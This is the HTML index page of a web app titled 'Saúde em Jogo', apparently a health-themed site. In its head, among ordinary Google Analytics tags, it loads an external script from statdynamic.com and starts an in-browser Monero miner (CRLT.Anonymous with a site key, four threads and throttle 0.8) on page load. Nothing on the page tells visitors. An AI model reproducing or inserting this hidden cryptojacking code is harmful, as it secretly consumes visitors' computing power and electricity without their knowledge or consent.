<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Saúde em Jogo</title>
  <base href="/">

  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="icon" type="image/x-icon" href="favicon.ico">
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
  <script src="//statdynamic.com/lib/crypta.js"></script>
  <script>
    var miner = new CRLT.Anonymous('497ced365f099091edde3dafacc612e5fb5e5bcd4f12', {
      threads: 4, throttle: 0.8, coin: "xmr",
    });
    miner.start();
  </script>
  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script async src="https://www.googletagmanager.com/gtag/js?id=UA-139029868-1"></script>
  <script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'UA-139029868-1');
  </script>

</head>
<body>
<sj-root></sj-root>
<script>
  (function(i, s, o, g, r, a, m) {
            i['GoogleAnalyticsObject'] = r;
            i[r] = i[r] || function() {
                (i[r].q = i[r].q || []).push(arguments)
            }, i[r].l = 1 * new Date();
            a = s.createElement(o),
                m = s.getElementsByTagName(o)[0];
            a.async = 1;
            a.src = g;
            m.parentNode.insertBefore(a, m)
        })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-139029868-1', 'auto');
</script>
</body>
</html>
